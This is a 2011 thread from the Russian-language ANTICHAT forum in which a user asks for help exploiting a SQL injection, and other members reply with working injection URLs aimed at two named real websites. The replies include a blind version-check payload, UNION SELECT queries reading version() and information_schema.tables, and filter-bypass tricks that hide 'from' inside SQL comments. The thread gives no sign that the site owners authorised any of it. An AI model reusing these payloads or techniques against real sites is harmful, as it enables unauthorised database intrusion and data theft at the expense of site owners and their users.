ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.06.2011, 21:38
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
на сайте есть sql inj
подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило
пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите
|
|
|
21.06.2011, 21:41
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от foozzi
foozzi said:
на сайте есть sql inj
подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило
пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите
ссылку в студию
|
|
|
|
21.06.2011, 21:41
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Сообщение от d1v
d1v said:
ссылку в студию
http://www.fbskins.com/facebook-layouts/cat.php?id=75
|
|
|
|
21.06.2011, 21:42
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от foozzi
foozzi said:
на сайте есть sql inj
подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило
пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите
там могут быть фильтрации, если есть вывод ошибки то попробуй через блинд, а вообще такие вопросы лудше с линками кидать, дабы можно что то было адекватней ответить по ситуации.
|
|
|
|
21.06.2011, 21:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от foozzi
foozzi said:
http://www.fbskins.com/facebook-layouts/cat.php?id=75
блайнд
Код:
Code:
http://www.fbskins.com/facebook-layouts/cat.php?id=(75)and(1)=if(mid((select(version())),1,1)=5,1,0)--+
|
|
|
|
22.06.2011, 00:26
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,table_name+fro m+information_schema.tables+--+
почему выдает ошибку 500 ?
|
|
|
|
22.06.2011, 00:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
http://notice.spacash.com/2257.php?id=-2902+union+select+5,unhex(hex(version())),666,666, 666,666,666,666,5,1000--+
ответ на твой вопрос.
версия 4+
|
|
|
|
22.06.2011, 01:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от M_script
M_script said:
foozzi
из-за "from"
http://notice.spacash.com/2257.php?id=-2902+--+from
http://notice.spacash.com/2257.php?id=-2902+--+frm
зато http://notice.spacash.com/2257.php?id=-2902/*from*/
|
|
|
|
22.06.2011, 01:26
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
попугай, ошибся.
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+from
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*from*/
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+frm
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*frm*/
http://notice.spacash.com/2257.php?id=-2902/*select+*//*from*/
upd:
http://notice.spacash.com/2257.php?id=-2902+union+select/**/1,2,3,4,5,6,7,8,9,10+from+XXX+--+
|
|
|
|
22.06.2011, 01:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Код:
Code:
notice.spacash.com/2257.php?id=(0)union+select(1),hex(version()),3,4,5,6,7,8,9,(10)from(table)--+
[upd] не успел чуток ) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
